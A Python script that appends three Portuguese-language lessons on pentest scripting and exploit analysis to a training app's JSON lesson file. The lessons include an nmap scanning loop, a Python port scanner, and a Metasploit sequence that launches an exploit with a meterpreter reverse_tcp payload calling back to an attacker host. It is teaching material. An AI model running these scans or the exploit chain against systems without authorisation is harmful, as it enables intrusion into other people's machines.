import json
with open('/home/gabriel/Downloads/64Gram Desktop/CyberDuo/scripts/lesson_definitions.json','r') as f: lessons=json.load(f)
lessons.extend([
{"filename":"10.0-introducao.html","module":"10","title":"Ferramentas 10.0","victory_msg":"FERRAMENTAS INICIADAS!","steps":[
{"type":"teach","icon":"fa-toolbox","title":"Ferramentas e Scripts","content":"Este módulo final cobre <b>scripting</b> (Bash, Python, PowerShell), <b>automação de testes</b> e <b>análise de código de exploits</b>. Saber programar diferencia um pentester profissional.","highlight":"Script = automação = eficiência"},
{"type":"teach","icon":"fa-code","title":"Linguagens Essenciais","content":"<b>Python</b>: a linguagem nº1 para pentest (scripts, exploits, automação). <b>Bash</b>: automação em Linux. <b>PowerShell</b>: automação em Windows/AD. <b>SQL</b>: exploração de bancos.","highlight":"Python + Bash + PowerShell = arsenal completo"},
{"type":"quiz","task":"Qual linguagem é mais usada para automação de tarefas de pentest?","options":["Python","Java","C#"],"correctText":"Python","explanation":"Python é a linguagem preferida por sua simplicidade e rica biblioteca de segurança."},
{"type":"fill","sentence":"Para automação em ambientes Windows e Active Directory, a linguagem mais usada é ___.","options":["PowerShell","Bash","Ruby"],"correctText":"PowerShell","explanation":"PowerShell é nativo do Windows e tem acesso direto ao Active Directory."}
]},
{"filename":"10.1-scripts-desenvolvimento.html","module":"10","title":"Scripts e Automação 10.1","victory_msg":"SCRIPTING DOMINADO!","steps":[
{"type":"teach","icon":"fa-terminal","title":"Bash Scripting","content":"<b>Bash</b> automatiza tarefas em Linux: enumeração de hosts, parsing de saída do Nmap, varreduras em massa. Um loop simples pode testar centenas de IPs.","highlight":"Bash = cola entre ferramentas"},
{"type":"example","icon":"fa-code","title":"Script de Port Scan em Bash","scenario":"Um script Bash que varre uma faixa de IPs e salva as portas abertas em um arquivo.","code":"for ip in $(seq 1 254); do\n  nmap -sS 192.168.1.$ip -p 22,80,443 >> scan.txt\ndone","takeaway":"Loops Bash automatizam tarefas repetitivas em segundos."},
{"type":"teach","icon":"fa-snake","title":"Python para Pentest","content":"Python com bibliotecas como <b>requests</b>, <b>scapy</b>, <b>pwntools</b> e <b>impacket</b> permite criar exploits, scanners e ferramentas customizadas.","highlight":"Python = linguagem do hacker moderno"},
{"type":"example","icon":"fa-code","title":"Scanner de Portas em Python","scenario":"Um scanner de portas simples usando sockets Python para verificar portas abertas em um host.","code":"import socket\nfor port in [22,80,443,8080]:\n  s = socket.socket()\n  s.settimeout(1)\n  if s.connect_ex(('alvo',port)) == 0:\n    print(f'Porta {port} aberta')\n  s.close()","takeaway":"Python permite criar ferramentas personalizadas em pouquíssimas linhas."},
{"type":"quiz","task":"Qual biblioteca Python é usada para manipular pacotes de rede de baixo nível?","options":["Scapy","Requests","Flask"],"correctText":"Scapy","explanation":"Scapy permite criar, enviar e analisar pacotes de rede personalizados."},
{"type":"match","title":"Biblioteca Python → Uso","pairs":[{"term":"Scapy","definition":"Manipulação de pacotes de rede"},{"term":"Requests","definition":"Requisições HTTP"},{"term":"Impacket","definition":"Protocolos Windows (SMB, NTLM)"},{"term":"Pwntools","definition":"Desenvolvimento de exploits"}]},
{"type":"fill","sentence":"A biblioteca Python usada para interagir com protocolos Windows como SMB e NTLM é o ___.","options":["Impacket","NumPy","Pandas"],"correctText":"Impacket","explanation":"Impacket é a biblioteca padrão para interação com protocolos de rede Windows."}
]},
{"filename":"10.2-ferramentas-analise.html","module":"10","title":"Análise de Exploits 10.2","victory_msg":"ANÁLISE DE EXPLOITS CONCLUÍDA!","steps":[
{"type":"teach","icon":"fa-microscope","title":"Análise de Código de Exploit","content":"Antes de executar um exploit, o pentester deve <b>ler e entender o código</b>. Exploits podem conter <b>backdoors</b> ou causar danos não previstos. Nunca execute código cegamente.","highlight":"Leia o exploit ANTES de executar"},
{"type":"teach","icon":"fa-database","title":"Exploit-DB e Metasploit","content":"<b>Exploit-DB</b> é o maior repositório público de exploits. <b>Metasploit</b> é o framework que organiza exploits, payloads e módulos auxiliares em uma interface unificada.","highlight":"Exploit-DB = biblioteca. Metasploit = framework."},
{"type":"example","icon":"fa-terminal","title":"Usando Metasploit","scenario":"Para explorar uma vulnerabilidade conhecida no Apache, o pentester seleciona o módulo, configura alvo e payload, e executa.","code":"use exploit/multi/http/apache_mod_cgi\nset RHOSTS 192.168.1.100\nset PAYLOAD linux/x64/meterpreter/reverse_tcp\nset LHOST 192.168.1.50\nexploit","takeaway":"Metasploit organiza exploits em módulos prontos para uso."},
{"type":"quiz","task":"Por que é essencial ler o código de um exploit antes de executá-lo?","options":["Pode conter backdoors ou causar danos não previstos","Porque os exploits são escritos em linguagens difíceis","Para verificar se o código está bonito e formatado"],"correctText":"Pode conter backdoors ou causar danos não previstos","explanation":"Exploits de fontes não confiáveis podem conter código malicioso embutido."},
{"type":"teach","icon":"fa-shield-halved","title":"CVE e Exploit Analysis","content":"Ao analisar um exploit, identifique: <b>CVE associado</b>, <b>versões afetadas</b>, <b>vetor de ataque</b> (rede/local), <b>tipo</b> (RCE, DoS, privesc) e <b>confiabilidade</b>.","highlight":"Entenda o que o exploit faz antes de usá-lo"},
{"type":"match","title":"Conceito → Definição","pairs":[{"term":"Exploit-DB","definition":"Repositório público de exploits"},{"term":"Metasploit","definition":"Framework de exploração"},{"term":"Meterpreter","definition":"Payload avançado pós-exploração"},{"term":"CVE","definition":"ID único de vulnerabilidade"}]},
{"type":"fill","sentence":"O payload avançado do Metasploit que fornece shell interativo com pivoting é o ___.","options":["Meterpreter","Netcat","Bash"],"correctText":"Meterpreter","explanation":"Meterpreter é um payload avançado com upload, download, pivoting, keylogger e mais."}
]}
])
with open('/home/gabriel/Downloads/64Gram Desktop/CyberDuo/scripts/lesson_definitions.json','w') as f: json.dump(lessons,f,ensure_ascii=False,indent=2)
print(f"✅ {len(lessons)} lessons (added Module 10 — ALL MODULES COMPLETE)")
